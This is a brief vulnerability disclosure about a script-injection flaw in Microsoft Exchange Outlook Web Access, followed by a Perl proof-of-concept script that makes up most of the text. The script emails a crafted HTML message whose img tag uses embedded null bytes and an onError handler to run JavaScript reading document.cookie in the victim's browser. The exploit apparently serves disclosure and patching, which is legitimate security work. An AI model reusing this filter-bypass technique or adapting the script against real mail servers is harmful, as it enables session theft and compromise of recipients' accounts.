source: https://www.securityfocus.com/bid/18381/info
Microsoft Exchange Server Outlook Web Access is prone to a script-injection vulnerability.
A remote attacker can exploit this issue by sending a malicious email message to a vulnerable user.
#!/usr/bin/perl
use Net::SMTP;
my $to = "recipient\@domain.tld";
my $sub = "Watch out - Cross Site Scripting Attack";
my $from = "originator\@domain2.tld";
my $smtp = "mail.example.tld";
my $cont = "<img alt='hugo\0abc' src='http://www.example.com/
imagethatdoesnotexist.gif' onError='javascript:alert(document.cookie)'
alt='<s'\0";
$smtp = Net::SMTP->new($smtp);
$smtp->mail("$from") || die("error 1");
$smtp->to("$to") || die("error 2");
$smtp->data() ;
$smtp->datasend("To: $to\n") ;
$smtp->datasend("From: $from\n") ;
$smtp->datasend("Subject: $sub\n");
$smtp->datasend("Content-Type: text/html\n\n");
$smtp->datasend("$cont") ;
$smtp->datasend("\n\n") ;
$smtp->dataend() ;
$smtp->quit() ;
print "$cont\n\ndone\n";